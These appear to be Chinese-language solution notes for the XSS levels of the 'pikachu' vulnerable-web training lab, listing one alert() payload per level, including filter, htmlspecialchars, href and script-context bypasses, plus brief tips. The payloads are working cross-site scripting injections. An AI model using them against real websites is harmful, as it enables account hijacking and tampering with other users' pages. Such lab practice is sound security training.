pikachu
反射型xss(get)
<script>alert('xss')</script>
注意
文本框有长度限制,可以在 URL中输入代码或者直接改前端代码
反射型xss(post)
<script>alert('xss’)</script>
存储型xss
<script>alert('xss')</script>
注意
代码植入后,可以尝试用其他浏览器访问此页面
DOM型xss
'><img src="#" onmouseover="alert('xss')">
DOM型xss-x
'><img src="#" onmouseover="alert('xss')">
xss之盲打
<script>alert('xss')</script>
注意
此关需要登录才会生效
xss之过滤
<img src='a' onerror="alert('xss')">
此处测试过滤时,如果单独输入"<>‘on/’() 则什么都没有被过滤,如果输入了“<>‘on/’() script img href src,则<>‘on/’() script 被删掉了,这说明什么问题?说明过滤语句可能是<.*script
xss之htmlspecialchars
'onclick='alert(/xss/)'
注意
字符被实体编码,但是单引号没编码
xss之href输出
javascript:alert(/xss/)
注意
<a>标签的 href属性用于指定超链接目标的 URL。
href 属性的值可以是任何有效文档的相对或绝对 URL包括片段标识符和 JavaScript 代码段。如果用户选择了<a>标签中的内容,那么浏览器会尝试检索并显示href属性指定的 URL所表示的文档,或者执行JavaScript 表达式、方法和函数的列表。
xss之js输出
</script><script>alert(/xss/)</script>
';alert(1);//';